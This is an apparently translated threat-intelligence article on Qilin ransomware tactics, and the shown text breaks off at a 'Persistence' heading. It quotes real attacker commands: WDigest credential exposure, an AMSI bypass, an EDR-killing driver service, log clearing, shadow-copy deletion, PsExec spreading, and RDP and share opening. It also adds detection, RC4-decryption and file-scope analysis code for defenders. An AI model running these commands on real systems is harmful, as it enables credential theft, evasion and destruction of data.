Qilin: how one of the most active ransomware groups works

28.10.2025 21 minutes Author: Cyber Witcher

This article covers how Qilin operates inside corporate infrastructure, which Windows and PowerShell commands it uses to move through the network, how to recognize indicators of compromise, and what is needed to detect an attack in time and stop its spread.

What happened?

  • In the second half of 2025, the Qilin ransomware group continued to post victim information on its leak site at a rate of over 40 cases per month, making it one of the most influential ransomware groups in the world. The manufacturing sector was the most affected, followed by professional and scientific services, and wholesale.

  • While this may be a false flag, some of the scripts used by the attacker contained character encodings that indicate Eastern Europe or the Russian-speaking region.

  • Among the tools used to exfiltrate data, Talos identified an open-source tool called Cyberduck, which allows files to be transferred to cloud servers. Cyberduck has been widely used in recent cases related to the Qilin ransomware. The artifact logs also show the use of notepad.exe and mspaint.exe, which were used to view sensitive information.

  • In Qilin cases, dual deployment has been recorded: encryptor_1.exe is distributed between hosts via PsExec, and encryptor_2.exe is launched from a single system to encrypt multiple network resources.

Brief description of Qilin ransomware

The Qilin ransomware group (formerly Agenda) has been active since approximately July 2022. The group uses a dual extortion strategy, combining file encryption with public disclosure of stolen information. Figure 1 shows the leak site that the attackers use to publish lists of compromised companies.

Figure 1. Qilin ransomware leak site.

Over the past few years, Qilin has expanded its operations and is now among the most widespread and damaging ransomware threats globally. The group operates a ransomware-as-a-service (RaaS) business model, in which it develops and distributes ransomware platforms and related tools to affiliates. These affiliates, in turn, attack organizations around the world.

Victimology and prevalence

Current reports show that the United States is the hardest hit, followed by Canada, the United Kingdom, France, and Germany.

Figure 2. Countries affected by Qilin ransomware.

Figure 3 shows the number of victims whose information was published on the Qilin ransomware leak site.

The data shows that the number of publications peaked at 100 cases in June 2025, and almost the same figure was recorded again in August. While the number of victims fluctuates from month to month, it is worth noting that, except for January, more than 40 cases were registered every month. These findings indicate that Qilin continues to pose a persistent and significant threat.

Figure 3. Number of victims listed on the Qilin ransomware leak website.

The sector most affected is manufacturing, accounting for approximately 23% of all reported cases, well ahead of other industries. The second most affected sector is professional and scientific services, accounting for approximately 18%. Wholesale trade comes in third, accounting for approximately 10% of cases.

In the middle range, several key sectors that make up the social infrastructure – healthcare, construction, retail, education and finance – report a similar level of impact, averaging around 5%.

At the lower end, sectors such as services and primary industry show relatively fewer incidents, remaining below 2% on average.

Figure 4. Damaged/impacted sectors.

Qilin Ransomware Attack Flowchart

In 2025, Cisco Talos responded to multiple incidents involving the Qilin ransomware. The overall attack flow is illustrated in Figure 5, and the following sections describe the tactics, techniques, and procedures (TTPs) observed at each stage.

Figure 5. TTPs from VPN compromise to Qilin ransomware execution.

Initial Access

Talos was unable to definitively identify a single confirmed initial intrusion vector. However, in some cases it assesses with moderate confidence that the attackers used administrative credentials leaked on the dark web to access the VPN, and may also have modified Active Directory Group Policy Objects (GPOs) to allow RDP connections into the victim networks.

In the incident illustrated in Figure 6, Talos confirmed that the credentials had been exposed on the dark web. Approximately two weeks later, multiple NTLM authentication attempts were made against the VPN, possibly using the leaked credentials, and one of them succeeded. From the VPN, the attackers opened RDP connections to the domain controller and to the initially compromised host. Although this activity correlates in time with the earlier credential exposure, the evidence is insufficient to establish a definitive causal link between the two events.

Notably, the VPN in this case had no multi-factor authentication (MFA) configured, so anyone holding the valid credentials had unrestricted access.

Figure 6. Example of an initial intrusion via VPN.

Reconnaissance and Discovery

After gaining access to the victim's network, the attacker ran nltest.exe and net.exe to list domain controllers and collect information about domain users.

nltest /dclist:<Domain>
net user <Username> /domain

Additionally, traces show that the attacker checked the privilege level of the current user with whoami, listed running processes such as explorer.exe with tasklist, and used the netscan tool for further reconnaissance.

C:\WINDOWS\system32\whoami.exe /priv
tasklist /FI "IMAGENAME eq explorer.exe" /FO CSV /NH

As described in the “Qilin Ransomware” section below, execution of the ransomware also resulted in the enumeration of hostnames, domain users, groups, and privileges.

Credential Access and Harvesting

In the cases investigated by Talos, a password-protected archive containing a set of credential-theft tools was found. Although the protection made it difficult to fully examine each file, the contents indicate the use of Mimikatz, several NirSoft password-recovery utilities, and a set of custom scripts.

Figure 7. Contents of the folder with credential collection tools.

The "!light.bat" batch file contains a reg add command that modifies the WDigest setting. Setting "UseLogonCredential" to 1 makes Windows keep logon credentials in cleartext in LSASS memory after authentication, where credential-dumping tools such as Mimikatz can read them. On Windows 8.1 / Server 2012 R2 and later this value defaults to 0, so re-enabling it is a reliable precursor of credential dumping.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1

After the reg add command, the batch file sequentially invoked netpass.exe, WebBrowserPassView.exe, BypassCredGuard.exe, SharpDecryptPwd, and finally Mimikatz. In the script (see Figure 8), SharpDecryptPwd is configured to extract and write out saved authentication data from multiple client applications, including WinSCP, Navicat, Xmanager, TeamViewer, FileZilla, Foxmail, TortoiseSVN, Google Chrome, RDCMan, and SunLogin, consolidating the collected credentials for later use or retrieval.

Figure 8. Collecting credentials from applications using SharpDecryptPwd.

After SharpDecryptPwd, !light.bat launched Mimikatz (Figure 9).

The Mimikatz commands targeted a range of sensitive data and system functions: clearing Windows event logs, enabling SeDebugPrivilege, extracting saved passwords from Chrome's SQLite database, recovering credentials from previous logons, and collecting credentials and configuration data for RDP, SSH, and Citrix.

Figure 9. Credential collection via Mimikatz.

pars.vbs formatted and merged the stolen data into a file named "result.txt", which was then sent to an attacker-controlled SMTP server (Figure 10). The script specifies the windows-1251 (Cyrillic) character encoding, which may indicate that the operator is from Eastern Europe or a Russian-speaking region.

Figure 10. The pars.vbs code that sends the stolen data to an external SMTP server.

Exfiltration Artifacts

After collection, WinRAR packaged the target data, and in some cases the archives were exfiltrated using open-source software. Below are the actual arguments used to run WinRAR.exe: -ep1 strips the base folder from the paths stored in the archive, and -r0 recurses into subdirectories only for wildcard file masks.

"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- <target files and directories>

Additionally, Talos found that the attackers used mspaint.exe, notepad.exe, and iexplore.exe to open and inspect files while searching through large numbers of files for sensitive information.

Figure 11. Selection of information stolen by the attacker.

In recent years, Cyberduck, an open-source client for transferring files to cloud storage, has been widely used in Qilin cases. By abusing legitimate cloud services for exfiltration, the attacker hides the activity inside traffic to trusted domains. As shown in Figure 12, the Cyberduck history file names Backblaze as the destination, with segmented (multipart) transfer enabled for large files.

Figure 12. Extract from Cyberduck history file.

Privilege Escalation and Lateral Movement

Using the stolen credentials described above, the attacker escalates privileges and moves laterally. Talos observed compromised accounts accessing multiple IP addresses and their network shares, as well as multiple NTLM authentication attempts against several VPN accounts, possibly using leaked credentials. To enable remote access, the attackers also modify firewall settings, change RDP settings via the registry, and perform related actions such as using rdpclip.exe.

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

The following command adds an account chosen by the attacker to the local Administrators group, giving it full control over the system.

C:\Windows\system32\net1 localgroup administrators <account> /add

They also run a command that creates a network share named "c" exposing the entire C: drive and grants Full access to the "Everyone" group, allowing unrestricted read and write access from the network.

net share c=c:\ /grant:everyone,full

Remote Access Software (T1219)

Before the ransomware was launched, the attacker installed several legitimate remote monitoring and management (RMM) tools. While Talos cannot definitively conclude that they were used for lateral movement, traces of several RMM tools were found: AnyDesk, Chrome Remote Desktop, Distant Desktop, GoToDesk, Quick Assist, and ScreenConnect. Figure 13 shows an excerpt from the ScreenConnect connection log, which indicates that ScreenConnect connected to the command-and-control (C2) server on port 8880.

Figure 13. Installing ScreenConnect and connecting to the attacker’s server (excerpt).

Defense Evasion

  • Obfuscated PowerShell

Figures 14 and 15 show two patterns of PowerShell code obfuscated with numeric (character-code) encoding to avoid detection.

Figure 14. Obfuscated PowerShell command #1.
Figure 15. Obfuscated PowerShell command #2.

Below is the decoded output of the above code.

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

Running these commands makes three configuration changes:

  1. Disable AMSI. Setting the private amsiInitFailed field to true makes the Antimalware Scan Interface report a failed initialization, so subsequent script content in that PowerShell process is no longer handed to the antivirus engine for scanning.

  2. Disable TLS certificate validation. A ServerCertificateValidationCallback that always returns $true lets the script download from C2 servers that present self-signed or otherwise invalid certificates without errors.

  3. Enable Restricted Admin mode. Setting DisableRestrictedAdmin to 0 enables Restricted Admin mode for RDP, which allows a client to authenticate with an NT hash or a Kerberos ticket instead of a password (pass-the-hash over RDP). Passwords are not sent to the target host, but an attacker who has already dumped NT hashes can now use them to log on over RDP and impersonate the user.
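One way to make such commands visible to string-based detection, as an added example that is not part of the original article or of Talos's tooling: decode the numeric layers, merge the split string literals, then look for the three settings changes. The page does not reproduce the exact encoding used in Figures 14 and 15, so the two numeric forms handled here ([char]N+[char]N+... and -join [char[]](N,N,...)) are assumptions, and SAMPLE is constructed by re-encoding the decoded script above rather than taken from the figures.

```python
import re

# Assumed encodings for the "numeric encoding" in Figures 14/15 (not shown on
# the page): runs of [char]N+[char]N+... and -join [char[]](N,N,...).
CHAR_RUN = re.compile(r"(?:\[char\]\s*\d+\s*\+\s*)*\[char\]\s*\d+", re.IGNORECASE)
CHAR_ARRAY = re.compile(r"-join\s*\[char\[\]\]\s*\(\s*([\d\s,]+)\)", re.IGNORECASE)
# 'Sys'+'tem' style splitting, visible in the decoded output above.
STR_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def _decode_run(m: re.Match) -> str:
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))


def _decode_array(m: re.Match) -> str:
    return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))


def normalize(script: str) -> str:
    """Undo the three obfuscation layers so string indicators become visible."""
    s = CHAR_ARRAY.sub(_decode_array, script)
    s = CHAR_RUN.sub(_decode_run, s)
    while True:  # repeat until no adjacent quoted literals remain
        merged = STR_CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", s)
        if merged == s:
            return s
        s = merged


# The three configuration changes described above.
INDICATORS = {
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed", re.IGNORECASE),
    "tls_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.IGNORECASE),
    "restricted_admin_enabled": re.compile(
        r"DisableRestrictedAdmin\s+/d\s+0\b", re.IGNORECASE),
}


def scan(script: str, deobfuscate: bool = True) -> dict:
    """Map each indicator name to whether it fires; deobfuscate=False shows what a naive scan sees."""
    text = normalize(script) if deobfuscate else script
    return {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}


# Constructed sample: the decoded script from this page re-encoded with the
# assumed layers. Not the actual content of Figures 14/15.
def _chars(s: str) -> str:
    return "+".join(f"[char]{ord(c)}" for c in s)


def _char_array(s: str) -> str:
    return "-join [char[]](" + ",".join(str(ord(c)) for c in s) + ")"


SAMPLE = "\n".join([
    "iex(" + _chars("[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}") + ")",
    "try{[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils')"
    ".GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)}catch{}",
    "iex(" + _char_array("reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa "
                         "/v DisableRestrictedAdmin /d 0 /t REG_DWORD") + ")",
])

if __name__ == "__main__":
    print("raw    :", scan(SAMPLE, deobfuscate=False))  # nothing fires
    print("decoded:", scan(SAMPLE))                     # all three fire
    print(normalize(SAMPLE))
```

The point of the raw-versus-decoded comparison is that none of the three indicators matches the obfuscated text, so a rule that only inspects the literal command line misses all of it; normalizing before matching is what makes the amsiInitFailed and DisableRestrictedAdmin strings appear.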

Disabling EDR

Talos observed attempts to disable EDR using a variety of methods. In general, the commands observed either ran the EDR product's own uninstall.exe directly or attempted to stop the relevant services via the sc command. The attackers were also seen running open-source tools such as dark-kill and HRSword. The following commands are traces of dark-kill: rather than running in user mode, dark.sys is registered as a kernel-mode driver service named dark and then started. The traces also show the attackers re-registering the driver from a different path when needed, and finally deleting the service to cover their tracks.

sc create dark type= kernel binPath=dark.sys
sc start dark
sc create dark type= kernel binPath=C:\Users\<user>\Downloads\DarkKill\Debug\dark.sys
sc delete dark

Additionally, to run "HRSword.exe", the attackers launched a batch file with administrator privileges through mshta, using VBScript's Shell.Application.ShellExecute with the runas verb. Since the logs show that the shortcut file HRSword.lnk was created after 1.bat ran, HRSword.exe was probably launched via this .lnk file.

mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c C:\Users\xx\xxx\HRSword\HRSWOR~1.BAT ::","","runas",1)

Impact and Inhibiting Recovery

Before the Qilin ransomware was launched, Talos observed post-exploitation tooling such as a Cobalt Strike loader and SystemBC being executed. Cobalt Strike had been detected on the compromised host earlier, but it is unclear whether Cobalt Strike was used to deploy SystemBC.

Cobalt Strike Loader

The Cobalt Strike loader examined by Talos decrypts an encrypted payload stored in the .bss section of the binary (Figure 16), then deploys and executes the Cobalt Strike Beacon in memory.

Figure 16. Encrypted payload contained in the .bss section.

The embedded encrypted payload is executed in memory following the flow shown in Figure 17. CreateThreadpoolWait and SetThreadpoolWait are Windows thread-pool APIs. Unlike the common CreateThread API, which immediately creates a new thread executing at the given address, they register a callback that the thread pool invokes once a kernel object becomes signaled.

In this code, decrypted_buf is registered as the callback through the arguments of CreateThreadpoolWait, so the callback will run when the wait object becomes signaled. VirtualProtect then makes the buffer executable, and MessageBoxA (shown in Figure 18 and intended as an anti-sandbox measure) requires user interaction. When the user clicks OK, SetThreadpoolWait is called; because EventA was created already signaled (bInitialState = 1), the decrypted code already present in memory executes immediately.

Figure 17. The basic process of the Cobalt Strike bootloader.
Figure 18. Anti-sandboxing using the MessageBoxA API.

Decryption uses a custom procedure based on RC4: the first 2048 bytes are decrypted in full, after which the data is processed in 32-byte blocks of which only the first 24 bytes are decrypted. The remaining 8 bytes of each block stay encrypted, so the output differs from standard RC4.

Figure 19. Custom RC4 process
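The custom RC4 variant described above, written out as an added example (not the loader's decompiled code) so the block layout can be checked against a dump. Two things are assumptions: the keystream is standard RC4 (KSA plus PRGA with the key the loader uses), and the 8 skipped bytes of each block still consume keystream so the stream stays aligned with the block boundary (consume_skipped=True; pass False for the other interpretation). The page does not say which of the two the real loader does, so confirm against the sample before relying on either.

```python
from typing import Iterator, List, Tuple

HEAD_LEN = 2048  # bytes decrypted in full
BLOCK = 32       # block size after the head
KEEP = 24        # bytes per block that are actually decrypted


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Standard RC4 KSA + PRGA; yields one keystream byte per call."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def is_decrypted_offset(offset: int) -> bool:
    """True if the loader XORs this offset; False for the 8 untouched bytes per block."""
    return offset < HEAD_LEN or (offset - HEAD_LEN) % BLOCK < KEEP


def custom_rc4(data: bytes, key: bytes, consume_skipped: bool = True) -> bytes:
    """Apply the custom scheme. XOR is symmetric, so this both encrypts and decrypts."""
    ks = rc4_keystream(key)
    out = bytearray(data)
    for off in range(len(out)):
        if is_decrypted_offset(off):
            out[off] ^= next(ks)
        elif consume_skipped:
            next(ks)  # assumption: keystream advances over the skipped bytes
    return bytes(out)


def untouched_ranges(length: int) -> List[Tuple[int, int]]:
    """[start, end) ranges left encrypted; handy when diffing a decrypted blob against memory."""
    return [(s + KEEP, min(s + BLOCK, length))
            for s in range(HEAD_LEN, length, BLOCK) if s + KEEP < length]


if __name__ == "__main__":
    # Constructed input: 3072 bytes of a counting pattern, not a real payload.
    plain = bytes(range(256)) * 12
    enc = custom_rc4(plain, b"example-key")
    print(untouched_ranges(len(enc))[:3])   # first ranges still holding ciphertext
    print(custom_rc4(enc, b"example-key") == plain)
```

For input shorter than 2048 bytes the function is plain RC4, so the standard "Key"/"Plaintext" test vector is a quick sanity check of the keystream before you apply it to a .bss dump. Since the ranges returned by untouched_ranges never see the keystream, a correctly decrypted Beacon should show recognizable code except in those 8-byte gaps.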

Cobalt Strike Beacon

According to its extracted configuration, the Cobalt Strike Beacon deployed in memory is version 4.x and uses a Malleable C2 profile to spoof HTTP headers. The http_get_header and http_post_header contain "Host: ocsp.verisign.com", decoupling the visible Host header from the actual destination so that the traffic looks like OCSP or certificate-distribution traffic. Communication uses HTTPS over TCP port 443 to the team server (C2).

Figure 20. Cobalt Strike configuration analysis output from 1768.py (excerpt)

Execution Method

Attackers sometimes run only one encryptor, but Talos has also observed cases where two were deployed. Where two were executed, the first, encryptor_1.exe, was spread across the environment with PsExec (see the command below): PsExec copies the local <encryptor_1>.exe to the remote host (-c, overwriting any existing copy with -f), runs it with the account's elevated token (-h), does not wait for it to finish (-d), and lets it interact with the desktop (-i). The second, encryptor_2.exe, runs from a single system and targets multiple network shares.

cmd /C [PsExec] -accepteula \\<IP address> -c -f -h -d -i C:\Users\xxx\<encryptor_1>.exe --password [PASSWORD] --spread --spread-process

PowerShell Commands Executed

A PowerShell command retrieves the hostnames of all computers in Active Directory (AD).

powershell -Command Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName

Another PowerShell command installs the RSAT-AD-PowerShell feature (trying three installation methods in turn) so that the Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS) cmdlets can be used to enumerate domain users, groups, and privileges.

Powershell -Command ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'

Next, Get-WinEvent -ListLog * lists all event logs on the system; those that contain records (RecordCount not 0) are selected, and the .NET EventLogSession.GlobalSession.ClearLog() method is called on each of them to clear it completely.

powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in  $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}

Finally, a hardcoded PowerShell script targets hosts in virtualized (VMware) environments.

The script connects to the vCenter server, enumerates all datacenters and clusters in the vCenter environment, and disables HA and DRS in the cluster configurations (see Figure 21).

Figure 21. Disable-ClusterServices function

It then enumerates all ESXi hosts, changes the root password, and enables SSH access. Finally, it downloads an arbitrary binary to the "/tmp" directory and executes it on every target host: it makes the binary executable with "chmod +x", sets the ESXi advanced option "/User/execInstalledOnly" to 0 using the command stored in $esxiRights (so that binaries not installed from a VIB may run), and then executes the payload on all hosts with the Process-ESXis function.

Figure 22. Process-ESXi and Process-ESXis functions (excerpt)

Lateral Movement (Symbolic Links)

To widen access to files and increase the impact of the ransomware, the fsutil command is also executed. It changes how Windows evaluates symbolic links: R2R stands for "Remote to Remote" (a link on a network share that points to another network share) and R2L for "Remote to Local" (a link on a network share that points to a local resource). Both evaluations are disabled by default; enabling them makes such links followable. For example, with R2R a symbolic link on server A can lead to files on server B, and with R2L a shared symbolic link on server A that points to a file on the host lets the attacker reach that local file through the share. These commands can be executed via PsExec.

cmd /C net use
cmd /C fsutil behavior set SymlinkEvaluation R2R:1
cmd /C fsutil behavior set SymlinkEvaluation R2L:1

Deleting Backups

The ransomware starts the Volume Shadow Copy Service (VSS), sets its startup type to Manual, deletes all shadow copies (volume snapshots) managed by VSS, then stops the service and sets its startup type to Disabled.

cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled

Ransom Note

A ransom note (Figure 23) is created in each encrypted folder. It states that data has been compromised, links to a .onion leak site that requires Tor, and provides a URL (given as an IP address) that victims without a Tor environment can reach directly. It also lists the types of data taken and warns of the consequences of ignoring the demands.

The "Credentials" section states that each victim company is assigned a unique company ID, which is also used as the extension of encrypted files, and that the site at the URL listed in the note can be accessed with this unique login ID and password.

Figure 23. Excerpt from the ransom note from Qilin.

Configuration

The Qilin ransomware configuration includes file-encryption settings, lists of services and processes to stop, and a list of accounts specific to the target environment. There are eight items; four of them are listed below:

  • “extension_black_list” contains file extensions that will not be encrypted.

  • “extension_white_list” specifies extensions that this ransomware will explicitly encrypt.

  • “filename_black_list” contains filenames that will not be encrypted.

  • “directory_black_list” contains a list of directories that will not be encrypted.

We also found two lists named "white_symlink_dirs" and "white_symlink_subdirs". In the analyzed sample, white_symlink_dirs is empty and white_symlink_subdirs contains a single entry, "ClusterStorage".

ClusterStorage is the directory used by Windows Server Failover Clustering for Cluster Shared Volumes (CSV). CSV volumes typically hold an organization's critical files, such as Hyper-V virtual machine disks (VHDX) and databases. This shows that the ransomware aims to increase its impact by going after virtualization and cluster infrastructure directly, not only regular user directories: symbolic links under ClusterStorage are explicitly followed so that their targets are encrypted. The empty white_symlink_dirs list is probably meant to avoid following other symbolic links, which could cause infinite loops or double encryption.

The "process_black_list" and "win_services_black_list" specify processes and services to terminate, including those related to databases, backups, security, and remote management. Notably, as Figure 24 shows, this configuration also contained a hardcoded domain, username, and password specific to the victim's environment, indicating that the attackers pre-loaded intelligence into the ransomware to facilitate privilege escalation and related actions.

extension_black_list:

["themepack", "nls", "diapkg", "msi", "lnk", "exe", "scr", "bat", "drv", "rtp", "msp", "prf", "msc", "ico", "key", "ocx", "diagcab", "diagcfg", "pdb", "wpx", "hlp", "icns", "rom", "dll", 
"msstyles", "mod", "ps1", "ics", "hta", "bin", "cmd", "ani", "386", "lock", "cur", "idx", "sys", "com", "deskthemepack", "shs", "theme", "mpa", "nomedia", "spl", "cpl", "adv", "icl", "msu", "company_id"]

extension_white_list:

["mdf", "ldf", "bak", "vib", "vbk", "vbm", "vrb", "vmdk", "abk", "bkz", "sqb", "trn", "backup", "bkup", "old", "tibx", "pfi", "pvhd", "pbf", "dim", "gho", "vpcbackup", "arc", "mtf", "bkf", "dr"]

filename_black_list:

["desktop.ini", "autorun.ini", "ntldr", "bootsect.bak", "thumbs.db", "boot.ini", "ntuser.dat", "iconcache.db", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "autorun.inf", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "#recycle", "autorun.inf", "boot.ini", "bootfont.bin", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "desktop.ini", "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini", "thumbs.db", "#recycle", "bootsect.bak"]

directory_black_list:

["windows", "system volume information", "intel", "admin$", "ipc$", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "program files (x86)", "program files", "$windows.~bt", "msocache", "tor browser", "programdata", "boot", "config.msi", "google", "perflogs", "appdata", "windows.old", "appdata", "..", ".", "boot", "windows", "windows.old", "$recycle.bin", "admin$"]

white_symlink_subdirs:

["ClusterStorage"]

process_black_list:

["vmms", "vmwp", "vmcompute", "agntsvc", "dbeng50", "dbsnmp", "encsvc", "excel", "firefox", "infopath", "isqlplussvc", "sql", "msaccess", "mspub", "mydesktopqos", "mydesktopservice", "notepad", "ocautoupds", "ocomm", "ocssd", "onenote", "oracle", "outlook", "powerpnt", "sqbcoreservice", "steam", "synctime", "tbirdconfig", "thebat", "thunderbird", "visio", "winword", "wordpad", "xfssvccon", "bedbh", "vxmon", "benetns", "bengien", "pvlsvr", "beserver", "raw_agent_svc", "vsnapvss", "cagservice", "qbidpservice", "qbdbmgrn", "qbcfmonitorservice", "sap", "teamviewer_service", "teamviewer", "tv_w32", "tv_x64", "cvmountd", "cvd", "cvfwd", "cvods", "saphostexec", "saposcol", "sapstartsrv", "avagent", "avscc", "dellsystemdetect", "enterpriseclient", "veeamnfssvc", "veeamtransportsvc", "veeamdeploymentsvc", "mvdesktopservice"]

win_services_black_list:

["vmms", "mepocs", "memtas", "veeam", "backup", "vss", "sql", "msexchange", "sophos", "msexchange", "msexchange\\$", "wsbexchange", "pdvfsservice", "backupexecvssprovider", "backupexecagentaccelerator", "backupexecagentbrowser", "backupexecdivecimediaservice", "backupexecjobengine", "backupexecmanagementservice", "backupexecrpcservice", "gxblr", "gxvss", "gxclmgrs", "gxcvd", "gxcimgr", "gxmmm", "gxvsshwprov", "gxfwd", "sapservice", "sap", "sap\\$", "sapd\\$", "saphostcontrol", "saphostexec", "qbcfmonitorservice", "qbdbmgrn", "qbidpservice", "acronisagent", "veeamnfssvc", "veeamdeploymentservice", "veeamtransportsvc", "mvarmor", "mvarmor64", "vsnapvss", "acrsch2svc", "(.*?)sql(.*?)"]

Accounts:

Figure 24. Hardcoded domain, username, and password specific to the victim’s environment.
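The file-selection rules these lists imply, as an added example that is not the ransomware's own code: a classifier that reports, for a given path, whether it would fall in scope and which list decides it. The matching semantics are assumptions: comparisons are case-insensitive, a file is excluded if any path component appears in directory_black_list, the extension is the text after the last dot, extension_white_list hits are reported as explicit targets, and a symbolic link is followed only if a path component is in white_symlink_subdirs (white_symlink_dirs being empty in the sample). Only a subset of the page's lists is embedded to keep the block short, and the sample paths are constructed.

```python
from typing import Dict, Iterable, List, Tuple

# Subsets of the lists printed above, lower-cased (the sample's duplicate
# entries make no difference to a set lookup).
EXTENSION_BLACK_LIST = {"themepack", "nls", "msi", "lnk", "exe", "scr", "bat", "drv", "dll",
                        "sys", "ps1", "cmd", "ico", "key", "lock", "company_id"}
EXTENSION_WHITE_LIST = {"mdf", "ldf", "bak", "vib", "vbk", "vbm", "vrb", "vmdk", "sqb",
                        "trn", "backup", "bkup", "old", "tibx", "pvhd", "gho", "bkf"}
FILENAME_BLACK_LIST = {"desktop.ini", "autorun.ini", "ntldr", "bootsect.bak", "thumbs.db",
                       "boot.ini", "ntuser.dat", "iconcache.db", "bootmgr", "bootmgr.efi",
                       "bootmgfw.efi", "#recycle"}
DIRECTORY_BLACK_LIST = {"windows", "system volume information", "intel", "admin$", "ipc$",
                        "sysvol", "netlogon", "program files", "program files (x86)",
                        "programdata", "appdata", "application data", "boot", "perflogs",
                        "windows.old", "$recycle.bin", "msocache", "tor browser", "google", "mozilla"}
WHITE_SYMLINK_DIRS: set = set()             # empty in the analyzed sample
WHITE_SYMLINK_SUBDIRS = {"clusterstorage"}  # the only entry in the analyzed sample


def _components(path: str) -> List[str]:
    """Split a Windows path into lower-cased components, dropping the drive letter."""
    parts = [p for p in path.replace("\\", "/").lower().split("/") if p]
    if parts and len(parts[0]) == 2 and parts[0][1] == ":":
        parts = parts[1:]
    return parts


def classify(path: str, is_symlink: bool = False) -> Tuple[bool, str]:
    """Return (would_be_encrypted, deciding_rule) for one path under the assumed rules."""
    parts = _components(path)
    if not parts:
        return False, "empty path"
    dirs, name = parts[:-1], parts[-1]
    if is_symlink:
        # Assumed semantics: a link is followed only if its parent is listed in
        # white_symlink_dirs or any ancestor is listed in white_symlink_subdirs.
        parent = dirs[-1] if dirs else ""
        if parent not in WHITE_SYMLINK_DIRS and not any(d in WHITE_SYMLINK_SUBDIRS for d in dirs):
            return False, "symbolic link outside white_symlink_dirs/white_symlink_subdirs"
    for d in dirs:
        if d in DIRECTORY_BLACK_LIST:
            return False, f"directory_black_list: {d}"
    if name in FILENAME_BLACK_LIST:
        return False, f"filename_black_list: {name}"
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    if ext in EXTENSION_BLACK_LIST:   # includes the per-victim extension of already encrypted files
        return False, f"extension_black_list: {ext}"
    if ext in EXTENSION_WHITE_LIST:
        return True, f"extension_white_list: {ext}"
    return True, "no exclusion matched"


def scope_report(paths: Iterable[str]) -> Dict[str, Tuple[bool, str]]:
    return {p: classify(p) for p in paths}


# Constructed sample paths, not taken from a real host.
SAMPLE_PATHS = [
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Users\alice\Desktop\desktop.ini",
    r"D:\Backups\erp\erp-2025-10-01.bak",
    r"D:\Shares\finance\q3.xlsx",
    r"D:\Shares\it\tool.exe",
    r"D:\Shares\finance\invoice.pdf.company_id",
]

if __name__ == "__main__":
    for p, (hit, why) in scope_report(SAMPLE_PATHS).items():
        print(f"{'ENCRYPT' if hit else 'skip   '} {p}  ({why})")
    print(classify(r"C:\ClusterStorage\Volume1", is_symlink=True))
    print(classify(r"D:\Shares\link.vhdx", is_symlink=True))
```

Running it over a file server's share listing gives a quick answer to "what would this sample have touched", and the two symlink calls show why the ClusterStorage entry matters: a CSV mount point under C:\ClusterStorage is followed, while a link elsewhere is not. The "company_id" entry in extension_black_list means files that already carry the per-victim extension are skipped, which is what prevents double encryption on a second run.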

Generating execution logs

On launch, a QLOG folder is created in %TEMP% and several ThreadId({Number}).LOG files are written there, giving the attacker detailed logs of the encryption process.

Figure 25. Contents of ThreadId({Number}).LOG (snippet).

Change wallpaper settings

The ransomware writes a JPG image to %TEMP%, sets it as the desktop wallpaper, and modifies the following registry value.

HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper
(Example)
Value: %TEMP%\ElSDJGep.jpg
Figure 26. Wallpaper changed by ransomware.

Persistence

